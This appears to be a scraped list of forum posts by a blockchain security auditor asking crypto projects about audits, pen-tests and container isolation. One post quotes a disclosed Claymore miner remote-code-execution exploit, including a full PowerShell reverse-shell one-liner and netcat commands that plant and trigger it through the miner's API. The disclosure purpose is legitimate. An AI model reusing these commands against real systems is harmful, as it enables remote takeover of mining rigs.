Search content
Sort by
Showing 20 of 34 results by blockaudit
Re: Code Auditing and Security Services (+ referral program)
Hello! My name is Olga, I represent company W12.io.
We plan to launch a referral program, according to which people can earn real money. I saw that you were doing a referral program for the Blockaudit project. Tell me, what is included in this program and how do you promote it? We are interested in cooperation. Thank you !
We plan to launch a referral program, according to which people can earn real money. I saw that you were doing a referral program for the Blockaudit project. Tell me, what is included in this program and how do you promote it? We are interested in cooperation. Thank you !
Olga,
You can check out our website's referral section for more details:
https://www.blockaudit.org/referrals.html
Re: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.7 (Windows/Linux)
FYI a remote exploit for v7.3+ was made public:
https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/
https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/
More precisely, it works until v8.1, in v8.1 "-mport" is working in read-only mode by default, check "History.txt" file for details. Another thing required for this "exploit" is direct access to internet for the system, it will not work via NAT or firewall without your permission.
Later versions had another issue that was fixed too, see my message:
https://bitcointalk.org/index.php?topic=1433925.msg28540417#msg28540417
Thanks for the data, good to know!
Have you all had any official security code reviews or application pen-tests in order to have more confidence that these types of trivial issues won't be found again?
Re: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.7 (Windows/Linux)
FYI a remote exploit for v7.3+ was made public:
https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/
It's unclear if this issue has been fixed or not, feel free to provide more information on what versions if was fixed on if so.
https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/
Quote
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Convert it into hexadecimal and paste it on the second parameter inside this string:
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
You got the shell!
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Convert it into hexadecimal and paste it on the second parameter inside this string:
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
You got the shell!
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.
It's unclear if this issue has been fixed or not, feel free to provide more information on what versions if was fixed on if so.
Quote
Before continuing to read I want to clarify that I already emailed nanopool without receiving any kind or response, so Im publicly disclosure this vulnerability waiting for a CVE assignment.
Per this announcement:
https://blog.sonm.io/sonm-crypto-iaas-is-here-2ab02e153d31
Docker is a container environment and is not meant to provide isolation between containers running on the same system. Will you have multiple containers running unrelated jobs on the same system?
If so, once a bug is discovered or the running code manages to escape the intended execution process, the blast radius of compromise will assume all containers running on that machine. That's why hypervisors which utilize hardware-assisted security for real virtual machines is standard for actual isolation of code.
Just google and read a few of the past problems to get an idea of how folks are going to escape from docker and similar container platforms in the future:
https://www.google.com/search?q=docker+escape
What is the plan to mitigate this? Lose the performance improvements without actual isolation and just run (1) container per bare metal? Better to get this right beforehand rather than later.
Are any penetration tests scheduled to get the data to further harden the system?
https://blog.sonm.io/sonm-crypto-iaas-is-here-2ab02e153d31
Docker is a container environment and is not meant to provide isolation between containers running on the same system. Will you have multiple containers running unrelated jobs on the same system?
If so, once a bug is discovered or the running code manages to escape the intended execution process, the blast radius of compromise will assume all containers running on that machine. That's why hypervisors which utilize hardware-assisted security for real virtual machines is standard for actual isolation of code.
Just google and read a few of the past problems to get an idea of how folks are going to escape from docker and similar container platforms in the future:
https://www.google.com/search?q=docker+escape
What is the plan to mitigate this? Lose the performance improvements without actual isolation and just run (1) container per bare metal? Better to get this right beforehand rather than later.
Are any penetration tests scheduled to get the data to further harden the system?
Re: Code Auditing and Security Services (+ referral program)
Re: [ANN][NET] - The Browser Based Blockchain - Main net Q1 2018 - Liqui
Great mainnet post on Medium, being added on Ledger will be super cool. Does the team plan to do a security/code review on the wallet, or the web browser?
Re: Code Auditing and Security Services (+ referral program)
You can follow some of our pro-bono contributions to the security of blockchain projects on github as well:
https://github.com/blockauditech
https://github.com/blockauditech
Re: [ANN][HEXX: REBORN] Xnodes| Zero Protocol | Community Driven | CPU Only
https://twitter.com/hxxcoin/status/989640546342842369
Could you share the security relevant commit links?
Thanks!
Could you share the security relevant commit links?
Thanks!
Nice project folks!
Wondering if you all have had a formal code audit or pen-test of the LBC application and media player... seems like a lot of cool features and therefore attack surface to cover.
Do you all regularly perform security code reviews in the dev process or penetration test engagements on the app and/or infrastructure side?
Wondering if you all have had a formal code audit or pen-test of the LBC application and media player... seems like a lot of cool features and therefore attack surface to cover.
Do you all regularly perform security code reviews in the dev process or penetration test engagements on the app and/or infrastructure side?
Re: Code Auditing and Security Services (+ referral program)
Bug Weekly #3 is out!
https://medium.com/@blockaudit/bug-weekly-3-injection-4f1a1377b09b
Enjoy folks :-D
https://medium.com/@blockaudit/bug-weekly-3-injection-4f1a1377b09b
Enjoy folks :-D
Re: [ANN] IPBC | NOW LIVE | NO PREMINE | NO ICO | FIRST MEDIA MINING PLAYER
Hey folks,
Why is the password limit 16 characters on ipbc.io?
If nothing else, it doesn't 'look good' to limit credentials like that, especially when often folks do much bigger random ones by default... ;-)
Shouldn't cost any more perf on the backend to open it up to 40 characters max.
Why is the password limit 16 characters on ipbc.io?
If nothing else, it doesn't 'look good' to limit credentials like that, especially when often folks do much bigger random ones by default... ;-)
Shouldn't cost any more perf on the backend to open it up to 40 characters max.
Re: [ANN] [ICO] MONETHA - Decentralised reputation with built-in payments
Got to know this project last summer, being disruptive in the online marketplace is an awesome story!
With the exciting app launch coming up (looking forward to the official announcement, btw), has the team done a security review on the app, especially its dealing with buyer and seller info, as well as transaction/rating data?
With the exciting app launch coming up (looking forward to the official announcement, btw), has the team done a security review on the app, especially its dealing with buyer and seller info, as well as transaction/rating data?
Re: [SOLD OUT] 🔴ADHIVE🔴 The first AI-controlled platform for influencer marketing
Have you all ran tools like Manitcore on the contracts, or had any sort of audit yet either of the current contracts or regular security code reviews built into the dev process for the exchange?
Just a cursory Manticore run yielded some potential issues, so just a heads up you all might want to give it a go to get the full results and see if they are or aren't exploitable.
Just a cursory Manticore run yielded some potential issues, so just a heads up you all might want to give it a go to get the full results and see if they are or aren't exploitable.
Code:
Global Findings:
- Integer overflow at ADD instruction -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 6291
........
- Potentially reading uninitialized storage -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 1695
- Integer overflow at ADD instruction -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 6291
........
- Potentially reading uninitialized storage -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 1695
Hello!
We use our own developed AI modules.
You do use the contracts on your github, right?
https://github.com/Tokpie/tokpie-contract/
That's the code on which the tools run on for results.
Re: Zoin - Privacy Based Zerocoin Protocol. NIX Announcement 4/30
Big things are happening! check the repo for a sneak peek https://github.com/NixPlatform
Lots of commits lately
How are you all avoiding security issues with Angular and such? Someone on the team checking each CR for sanitization and validation?
Must watch out for ngBindHtml() and a few others...
Re: [SOLD OUT] 🔴ADHIVE🔴 The first AI-controlled platform for influencer marketing
Have you all ran tools like Manitcore on the contracts, or had any sort of audit yet either of the current contracts or regular security code reviews built into the dev process for the exchange?
Just a cursory Manticore run yielded some potential issues, so just a heads up you all might want to give it a go to get the full results and see if they are or aren't exploitable.
Just a cursory Manticore run yielded some potential issues, so just a heads up you all might want to give it a go to get the full results and see if they are or aren't exploitable.
Code:
Global Findings:
- Integer overflow at ADD instruction -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 6291
........
- Potentially reading uninitialized storage -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 1695
- Integer overflow at ADD instruction -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 6291
........
- Potentially reading uninitialized storage -
Contract: 159725171979439281175487293058222017669144629231
Program counter: 1695
Re: BYTEBALL: Totally new consensus algorithm + private untraceable payments
Quite a bit of new code from writing the client, wallet, protocol implementation from scratch... have you all put together a proper threat model, identified (and reduced) attack surface and tested a bunch of key interfaces to shake out any security related bugs yet?
Big fan of the Byteball project btw
Big fan of the Byteball project btw
Re: 👽 [ANN][BIS]Bismuth - New Language, Free DAPPs, Cryptopia, HEAT
That's quite a bit of new code for this project, rapid releases and all. Writing it in Python over C/C++ gives you quite a bit of advantages for not having to deal with casting, native memory allocations, etc.
Have you all had a audit of the code base, fuzzing or other security testing to shake out some bugs eg. in the daemon?
Have you all had a audit of the code base, fuzzing or other security testing to shake out some bugs eg. in the daemon?
Re: WINGS ★ Where DAO Unicorns Are Born! ★ Token launched!
Big fan of the Wings project. But I bet there's a lot of complexity in the backend to handle the platform side of things.
Besides the smart contract, have you all had a deeper security review into the infrastructure and website portions, the various code handling user interactions and such?
Besides the smart contract, have you all had a deeper security review into the infrastructure and website portions, the various code handling user interactions and such?
Re: Belacoin - Supercharging entrepreneurship with the power of the blockchain
Hey Belacoin, what's your security story for the website, backend, mobile app, etc?
Looks like there's quite a bit to do for supporting the infrastructure, keeping all the data safe and validating all the upload/comment stuff on the website.
Loving the tagging feature by the way!
Looks like there's quite a bit to do for supporting the infrastructure, keeping all the data safe and validating all the upload/comment stuff on the website.
Loving the tagging feature by the way!
Just curious what data you can provide on the web services and backend having a proper penetration test or security audit. It seems like there's a lot going on to make various aspects of the site work for users, including scheduling, balance retrieval and especially the cool up and coming leasing program.
Thanks!
Thanks!